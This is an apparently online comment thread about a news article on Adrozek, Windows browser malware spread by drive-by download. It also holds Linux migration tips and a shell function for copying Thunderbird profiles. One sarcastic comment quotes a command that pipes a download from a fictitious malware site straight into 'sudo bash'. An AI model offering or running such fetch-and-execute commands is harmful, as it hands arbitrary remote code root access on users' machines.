The article leaves it open whether the user needs to double-click the malicious file or whether it is executed without user interaction through some exploit.
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.
Not really the article's fault. As they state near the end, Microsoft themselves didn't provide this info.
> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.
It is still the article's fault for existing at all. The behaviour of the payload is not very interesting or helpful and you have to read almost the entire article to discover that you have wasted your time.
That's fairly typical of a Dan Goodin article. The best you can really hope to do is pick out some search terms that'll find something actually useful, like the source material in this case: https://www.microsoft.com/security/blog/2020/12/10/widesprea...
It's like those "oh my god new Android malware is eating the world" articles that just casually say "after the user installs the apk and gives it device admin permissions" as if it's not a barrier at all. Coincidentally, these articles are usually written by anti-virus companies.
It's the line about dropping installer exe files into a directory which is where I stopped reading. This sounds like it needs user execution so isn't really anything new.
Penny Arcade is considering running ads again partly because, as they put it, "I seem to have found somebody that won't serve weird scripts to readers, which has the scent of progress."
They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones." Hence the bind less profitable websites find themselves in.
Why are we not seeing more information from MS on this? Should they not explain exactly how it behaves, like if it requires user interaction to run or whatnot? I get that their policy is never to say anything meaningful unless it's a marketing pitch, but this seems like the exact right time to be open and explain exactly what it does.
I will be downvoted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.
It was a comment on "do stupid things, win stupid prizes." i.e. if you download random bits of code from suspicious websites and give it super user access, you're going to have a bad time.
Wonder if my use of uBO and NoScript would protect from this? I'm trying to use a Fedora KDE Linux box as my daily driver, but my Windows 8 lappy still sits there to run Thunderbird rules and OneNote, so I'm half protected from an OS perspective I guess?
> you can run thunderbird on linux, copy your rules over.
Now there's a good idea. Going to research how to install Thunderbird on Linux now. I've been a Windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.
Installing popular open source apps on Linux is generally super easy.
On Ubuntu (and most other desktop-centric Linux distros) the installation process is going to look something like opening the "Software Center" application, searching for "Thunderbird" and clicking "Install."
Install Thunderbird from a package manager. On Fedora I suppose that's DNF or RPM now, but it used to be yum or RPM.
Some analogous folders between Windows and Linux (the File Hierarchy Standard):
System-wide binaries (.exe) for userland software on Windows:
C:\Program Files (x86)\
C:\Program Files\
System-wide binaries for userland software on Linux:
/usr/bin/
/usr/local/bin/
System-wide configuration files on Windows:
C:\Program Data\
System-wide configuration files on Linux:
/etc/
Per-user binaries (.exe) on Windows:
C:\Users\JillS\AppData\Local\
C:\Users\JillS\AppData\Local\Programs\
Per-user binaries on Linux:
/home/jills/.local/bin/
(also various user-specified locations under /home/jills/)
Per-user configuration files on Windows:
C:\Users\JillS\
C:\Users\JillS\AppData\Roaming\
Per-user configuration files on Linux:
/home/jills/.config/
(A different location can be specified on most Linux desktop setups (i.e., those that use the X Window System) by changing environment variable $XDG_CONFIG_HOME to equal the desired location)
Admin (root) binaries on Windows:
C:\Windows\
Root (admin) binaries on Linux:
/bin/
/sbin/
The environment variable PATH works the same in principle on both Windows and Linux. On Windows you change PATH in the GUI "Edit environment variables for your account". On Linux you typically use a text editor to open one of the standard "dot" files in /home/jills/, such as .profile or .bashrc, and specify PATH in there.
EDIT:
It would help if you knew where Fedora's Thunderbird packagers put your Thunderbird email files. I think it's typically
/home/multicomp/.thunderbird/
If that's true in your case, then just find your `x1y2z3.default` folders on Windows and copy them to that Linux directory. Not sure if the `.ini` files matter, but copying those shouldn't hurt.
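As an added example (not the commenter's own script), a POSIX shell function that does the copy described above from a mounted Windows drive into the Linux profile directory. It assumes the usual Windows layout (`...\AppData\Roaming\Thunderbird\Profiles\<id>.default`) and `$HOME/.thunderbird` as the destination, and it rewrites the `Path=` lines of profiles.ini because Windows keeps profiles under `Profiles\` while the Linux directory holds them directly.

```shell
#!/bin/sh
# Copy Thunderbird profile folders from a mounted Windows drive into the
# Linux profile directory without clobbering anything already there.
#
# Usage: migrate_tb_profiles <windows_profiles_dir> [linux_thunderbird_dir]
#   windows_profiles_dir is assumed to be
#   <mount>/Users/<name>/AppData/Roaming/Thunderbird/Profiles
# Prints the names of the profiles copied; returns non-zero if the source
# directory is missing or nothing new was copied.
migrate_tb_profiles() {
    src="$1"
    dst="${2:-$HOME/.thunderbird}"
    [ -d "$src" ] || { echo "source not found: $src" >&2; return 1; }
    mkdir -p "$dst"
    copied=0
    for dir in "$src"/*.default*; do
        [ -d "$dir" ] || continue          # no match leaves the literal glob
        name=$(basename "$dir")
        if [ -e "$dst/$name" ]; then
            echo "skipping $name: already present in $dst" >&2
            continue
        fi
        cp -Rp "$dir" "$dst/$name"         # -p keeps timestamps and modes
        echo "$name"
        copied=$((copied + 1))
    done
    # profiles.ini sits one level above Profiles\ on Windows. Copy it only if
    # Linux Thunderbird has not written its own, dropping the Profiles/ prefix
    # from Path= entries and the CRLF line endings.
    if [ -f "$src/../profiles.ini" ] && [ ! -f "$dst/profiles.ini" ]; then
        sed 's|^Path=Profiles/|Path=|' "$src/../profiles.ini" \
            | tr -d '\r' > "$dst/profiles.ini"
    fi
    [ "$copied" -gt 0 ]
}

# Only run when invoked directly with arguments, so sourcing the file is safe.
if [ "$#" -gt 0 ]; then
    migrate_tb_profiles "$@"
fi
```

Run it with Thunderbird closed on both sides; an existing profile folder in the destination is skipped rather than merged.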
Two of my desktop and one of my laptop PCs were hit recently and I was not aware who the most likely corporate or until I read this post. Strange thing is that yesterday I started noticing the same pop-ups in my browser on my Android phone. I'm reinstalling Windows later today on all my three PCs and will be using virustotal religiously.
If you're not running javascript, probably. Better yet fire up a VM if you're heading into the nether-regions of the internet. Or there's also Sandboxie, anyone still use it and recommend?
As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.
“On Edge, for instance, the malware modifies MsEdge.dll so that it turns off security controls that help detect unauthorized changes to the Secure Preferences file.”
How can malware tamper with a system DLL without code signing setting off alarms?
Microsoft Windows compromised through browser drive-by attack.
“The post said that Adrozek is installed “through drive-by download.” Installer file names use the format of setup__.exe. Attackers drop a file in the Windows temporary folder”